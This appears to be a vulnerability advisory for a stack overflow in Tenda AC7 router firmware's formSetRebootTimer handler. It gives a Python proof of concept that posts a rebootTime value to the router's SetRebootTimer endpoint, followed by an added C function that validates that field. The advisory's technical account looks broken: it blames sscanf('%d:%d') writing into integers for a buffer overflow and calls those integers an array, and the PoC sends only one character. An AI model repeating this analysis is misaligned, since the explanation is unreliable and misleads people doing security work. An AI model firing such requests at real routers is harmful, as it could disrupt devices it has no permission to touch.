AC7V1.0 V15.03.06.44
The Tenda AC7V1.0 V15.03.06.44 firmware has a stack overflow vulnerability in the formSetRebootTimer function. The reboot_time variable receives the rebootTime parameter from a POST request. However, since the user can control the input of rebootTime, the statement sscanf(reboot_time, "%d:%d", &end_hour, &end_min) can cause a buffer overflow. The user-provided rebootTime can exceed the capacity of the end_hour, end_min array, triggering this security vulnerability.
import requests
ip = "192.168.84.101"
url = "http://" + ip + "/goform/SetRebootTimer"
payload = "a"*1
data = {"rebootTime": payload}
response = requests.post(url, data=data)
print(response.text)
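
For the mitigation side, here is one way a handler could validate the rebootTime value before any field is parsed out of it. This is an added example, not Tenda's code and not part of the original advisory. The helper name parse_reboot_time, the "H:MM" / "HH:MM" form with two minute digits, and the 0-23 / 0-59 ranges are assumptions.

```c
#include <ctype.h>
#include <stdio.h>

/* Hypothetical helper (assumption, not firmware code): strictly parse an
 * untrusted rebootTime string of the form "H:MM" or "HH:MM".
 * Returns 0 and fills hour/min on success, -1 on any rejection. */
int parse_reboot_time(const char *s, int *hour, int *min)
{
    size_t len, i, colon;
    int h = 0, m = 0;

    if (s == NULL || hour == NULL || min == NULL)
        return -1;

    /* Bounded length scan: stop at 6, one past the longest valid form. */
    for (len = 0; len < 6 && s[len] != '\0'; len++)
        ;
    if (len < 4 || len > 5)
        return -1;
    colon = len - 3;                 /* exactly two minute digits required */
    if (s[colon] != ':')
        return -1;
    for (i = 0; i < len; i++) {
        if (i == colon)
            continue;
        if (!isdigit((unsigned char)s[i]))
            return -1;               /* rejects signs, spaces, letters */
        if (i < colon)
            h = h * 10 + (s[i] - '0');
        else
            m = m * 10 + (s[i] - '0');
    }
    if (h > 23 || m > 59)            /* assumed 24-hour clock ranges */
        return -1;
    *hour = h;                       /* outputs are written only on success */
    *min = m;
    return 0;
}

int main(void)
{
    /* Constructed sample inputs, including the PoC's one-character value. */
    const char *samples[] = { "03:30", "9:05", "a", "24:00", "12:3a", "-1:00" };
    int h, m;
    for (size_t i = 0; i < sizeof samples / sizeof samples[0]; i++)
        printf("%-6s -> %s\n", samples[i],
               parse_reboot_time(samples[i], &h, &m) == 0 ? "accepted" : "rejected");
    return 0;
}
```

Because the length is bounded before anything else is read, an oversized rebootTime is rejected without being copied or scanned further.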